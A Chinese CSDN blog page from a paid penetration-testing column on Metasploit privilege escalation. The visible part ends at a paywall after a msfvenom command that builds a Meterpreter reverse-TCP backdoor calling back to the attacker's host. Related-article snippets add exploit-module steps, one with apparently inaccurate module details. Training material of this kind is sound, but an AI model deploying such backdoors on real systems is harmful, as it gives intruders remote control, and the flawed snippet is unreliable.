48-2 内网渗透 - 利用Metasploit提权

狗蛋的博客之旅

已于 2024-06-20 18:13:12 修改

阅读量79

点赞数

分类专栏： Web安全渗透文章标签： web安全

于 2024-06-19 22:07:20 首次发布

本文链接：https://blog.csdn.net/weixin_43263566/article/details/139786327

版权

Web安全渗透专栏收录该内容

229 篇文章 3 订阅 ¥299.90 ¥99.00

订阅专栏

这篇文章会用到上篇的webshell：48-1 内网渗透 - 内核漏洞提权-CSDN博客

一、Metasploit提权过程概述

· Metasploit是一个开源的安全漏洞检测工具，广泛用于安全和IT专业人士识别、验证和利用安全漏洞，同时也支持专家驱动的安全评估和管理。

提权过程详解

1）生成后门

在Kali Linux上使用msfvenom生成反向连接的后门文件。

# ip 要改成自己kali的ip
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.4 lport=8888 -f exe -o msf.exe

-p windows/meterpreter/reverse_tcp: 使用Meterpreter反向TCP shell。
LHOST=xxxx: 指定Kali Linux的IP地址，即后门连接的目标。
LPORT=8888: 指定监听端口。
-f exe: 指定输出文件格式为可执行文件（exe格式）。
-o ./msf.exe: 指定输出文件名为msf.exe。(./ 表示将生成的文件存放在当前目录)

了解本专栏

订阅专栏解锁全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

狗蛋的博客之旅

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
48-2 内网渗透 - 利用Metasploit提权

Metasploit是一个开源的安全漏洞检测工具，广泛用于安全和IT专业人士识别、验证和利用安全漏洞，同时也支持专家驱动的安全评估和管理。
复制链接

扫一扫

专栏目录

订阅专栏

48-4 内网渗透 - Rotten Potato(烂土豆) 提权

weixin_43263566的博客

06-21

176

在渗透测试中，Potato家族是一种常用的提权技术，主要利用Windows服务账户的特权来将已获取的权限提升至系统（SYSTEM）级别。具体而言，Potato家族的攻击方式是将已获得的NT AUTHORITY\SYSTEM账户的访问令牌传递给CreateProcessWithTokenW或CreateProcessAsUserA函数，从而在SYSTEM账户的上下文中启动新进程，从而实现权限提升。，这篇文章介绍的提权方式跟之前最大的优势就是可以通过。，上一篇文章介绍的只能在管理员权限的基础上提升。

48-5 内网渗透 - JuicyPotato、Pipe Potato提权

最新发布

weixin_43263566的博客

06-22

运行 JuicyPotato，将获取 SYSTEM 权限并运行指定的攻击载荷（先使用 MetaSploit 监听），成功获取到一个 SYSTEM 权限的 Meterpreter。程序，这里我就直接用蚁剑上传了，如果是实际环境中我们就是通过一些漏洞或钓鱼上线蚁剑，之前的文章我们就是通过命令执行漏洞上线的蚁剑，这里就不重复了。那样依赖于一个现有的 Meterpreter，并且可以自定义 COM 对象加载的端口，以及根据系统版本更换可用的 COM 对象。中使用的 COM 对象为 BITS，而。

参与评论您还未登录，请先登录后发表或查看评论

渗透- 基于metasploit的内网渗透 - ms08-067漏洞利用及其原理分析

joke_ljh的博客

08-31

2380

ms08-067漏洞利用内网渗透：利用漏洞：Ms08-067 使用工具metasploit 前提：靶机具有ms08-067漏洞（可以用nessus扫描），在同一局域网，且具有连通性。基本命令： Use exploit/windows/smb/ms08_067_netapi Set rhost 192.168.10.2 Set lhost 192.168.10.1 Set lport 7777...

渗透测试 — Metasploit 内网渗透二—— 实战渗透操作--感受渗透流程，具体做什么 -永恒之蓝漏洞

天下著书立传者，皆为我师

04-24

1085

渗透测试实战练习1——永恒之蓝漏洞（渗透攻击 Win7 主机并远程执行命令）以及mysql空密码扫描利用（获取mysql数据库中信息）

内网渗透 -- 提升权限(利用提权漏洞)

weixin_41489908的博客

06-27

810

沉默不是没有情绪，是感觉没有再说的意义。。。。 ---- 网易云热评环境：小攻：Kali 2020，ip：192.168.1.133 小受：win7 x86，ip：192.168.1.137 一、生成木马 1、查看Windows下可利用的payloads msfvenom -l payloads | grep windows | grep tcp 2、选择windows/meterpreter/reverse_tcp并生成木马 -p 选择一个payload ...

内网渗透-Windows内网渗透

lza20001103的博客

08-15

1303

内网渗透-Windows内网渗透文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat：SecureCRT：Xshell：WinSCP：VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.

渗透-基于metasploit的内网渗透- ms10-002漏洞 - ms-15-020漏洞利用及其原理分析

joke_ljh的博客

08-31

4733

渗透-基于metasploit的内网渗透- ms10-002漏洞 - ms-15-020漏洞利用及其原理分析漏洞利用及其原理分析在前面已经讲了利用metaspolit工具利用ms08-067漏洞进行的内网渗透，但是假如你要渗透的对象和你不在同一个局域网，那怎么办？你是不可能攻击到内网的主机，那我们可以想办法让它出来，让它出来主动与我们建立连接。我们可以利用ms10-002漏洞来进行渗透，它是...

【学习-内网渗透技术基础性知识】

叫我小虎就行了的博客

09-19

509

【学习-内网渗透技术基础性知识】

内网渗透常用提权方式总结

j1044957016的博客

06-01

7182

内网菜鸡艰难学习，希望一样的菜鸡能省去打开一堆链接的时间吧

linux内网渗透1

08-03

反弹Meterpreter shell后，通常会进行更深入的内网渗透，例如利用已知漏洞，尝试对开放服务进行攻击，或者通过中间跳板进一步探索网络。综上所述，此过程展示了Linux内网渗透的基本步骤，包括漏洞利用、权限提升...

渗透测试工具的使用（PDF课件资料）

05-30

使用Metasploit进行漏洞利用.pdf 使用nbtscan进行目标机器识别.pdf 使用nmap进行操作机器识别.pdf 使用onesixtyone进行目标机器识别.pdf 使用p0f进行操作机器识别.pdf 使用ptunnel进行内网穿透.pdf 使用stunnel内网...

内网MSF11111

01-05

内网渗透测试中，Metasploit（MSF）是一个常用的安全工具，用于模拟攻击和漏洞利用。本文将详细讲解如何在内网环境中配置MSF，包括PostgreSQL数据库的安装、管理以及MSF数据库的设置。首先，安装PostgreSQL数据库...

第二十五课：基于MSF发现内网存活主机第三季1

08-03

在本课程中，我们将深入探讨如何使用Metasploit框架（MSF）进行内网存活主机的发现。Metasploit是一款广泛使用的开源安全测试工具，它包含了大量的扫描器模块，可以帮助安全专家和渗透测试人员识别网络中的活动主机...

第二十六课：基于MSF发现内网存活主机第四季1

08-03

在网络安全领域，发现内网存活主机是渗透测试和安全审计中的关键步骤，这有助于了解网络环境的现状，识别潜在的安全漏洞。本课程分为四季，分别介绍了Metasploit Framework（MSF）中的不同扫描模块，用于辅助检测...

Pentest Muse：一款专为网络安全人员设计的AI助手

FreeBuf_的博客

06-19

1343

在代理模式下，Pentest Muse能够帮助我们完成一系列简单的任务，例如“帮我们在url为xxx的目标上执行SQL注入测试”。上注册后，我们就可以使用Pentest Muse来管理API了，创建一个账号，打开Pentest Muse的命令行接口，程序将会提示我们进行登录。在聊天模式中，我们可以直接与Pentest Muse聊天，并请它帮我们头脑风暴、编写Payload或对代码进行安全分析。简而言之，我们只需要把想做的事情告诉Pentest Muse，它就能够帮助我们完成想要的安全测试与评估任务。

网络安全和信息安全

waitaikong_的博客

06-12

1191

信息安全、网络安全与网络空间安全是当前信息技术领域内的三个重要概念，它们在某些方面有着紧密的联系，同时在不同的语境和应用场景下又有所区别。本次分析旨在深入理解这三个概念的定义、内涵及其相互关系，以便更好地应用于实际工作中。综上所述，信息安全、网络安全和网络空间安全是三个密切相关但又各具特色的概念。信息安全关注的是信息本身的保护，网络安全侧重于网络环境和设施的安全，而网络空间安全则是一个更全面的框架，它不仅包括了信息安全和网络安全的内容，还延伸到了更广泛的社会和法律层面。

Python网络安全项目开发实战，如何防命令注入

一个好知识的传播者

06-20

827

防止命令注入是Python网络安全项目开发中的重要一环。通过用户输入验证、参数化查询、使用安全函数和库、最小权限原则、输出编码和转义、错误处理和日志记录、安全审计和监控以及安全培训和意识提升等方法，可以大大降低命令注入的风险。

网络安全（补充）

m0_62207482的博客

06-15

737

物理安全威胁一般分为自然安全威胁和人为安全威胁。自然安全威胁包括地震、洪水、火灾、鼠害、雷电；；；；人为安全威胁包括盗窃、爆炸、毁坏、硬件安全防火墙白名单策略：只允许符合安全规则的包通过防火墙，其他通信包禁止防火墙名单策略：禁止与安全规则相冲突的包通过防火墙，其他通信包都允许将入侵检测系统置于防火墙内部，使得很多对网络的攻击首先被防火墙过滤，也就是防火墙是首当其冲的，从而减少了对内部入侵检测系统的干扰，提高入侵检测系统的准确率，但是其检测能力不会变化通过VPN技术，企业可以在远程用户、分

（1）利用MS18-8120通过Metasploit对Windows提权

05-10

MS18-8120是一个Windows提权漏洞，它可以影响Windows 7 SP1 x86和x64、Windows 8.1 x86和x64、Windows Server 2008 R2 SP1、Windows Server 2012和Windows Server 2012 R2。这个漏洞是在Windows内核中存在一个缺陷，攻击者可以利用这个缺陷来提升他们的权限，从而执行任意代码。下面是一些利用MS18-8120漏洞进行Windows提权的步骤： 1.使用Metasploit框架：Metasploit是一个开源的渗透测试框架，它可以帮助安全专业人员快速、高效地发现和利用漏洞。在这个案例中，我们将使用Metasploit框架来利用MS18-8120漏洞。 2. 扫描目标：首先，我们需要扫描目标系统以检测是否存在漏洞。使用Nmap或其他扫描工具扫描目标IP地址，如下所示： ``` nmap -sV -O targetIP ``` 3. 打开Metasploit：打开Kali Linux操作系统并打开Metasploit框架，使用以下命令： ``` msfconsole ``` 4. 搜索漏洞利用模块：在Metasploit控制台中，使用以下命令搜索与MS18-8120漏洞相关的模块： ``` search MS18-8120 ``` 5. 选择漏洞利用模块：从搜索结果中选择一个适合我们的漏洞利用模块。在这个案例中，我们将选择“exploit/windows/local/ms18_8120_dcom”，使用以下命令： ``` use exploit/windows/local/ms18_8120_dcom ``` 6. 配置漏洞利用模块：在我们使用模块之前，我们需要配置一些参数。使用以下命令来查看可用的参数： ``` show options ``` 7. 配置目标IP地址和端口号：我们需要设置目标IP地址和端口号。使用以下命令设置目标IP地址和端口号： ``` set RHOST targetIP set RPORT targetPort ``` 8. 运行漏洞利用模块：设置完参数后，使用以下命令运行漏洞利用模块： ``` run ``` 9. 检查提权结果：漏洞利用模块运行后，我们可以检查提权结果。使用以下命令检查当前用户的权限： ``` getuid ``` 如果返回结果为“NT AUTHORITY\SYSTEM”，则说明我们已经成功提升了我们的权限。总结：通过使用Metasploit框架和MS18-8120漏洞利用模块，我们可以快速、高效地进行Windows提权攻击。但是请注意，任何未经授权的攻击都是非法的。只有在合法的渗透测试环境中使用这些技术。

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交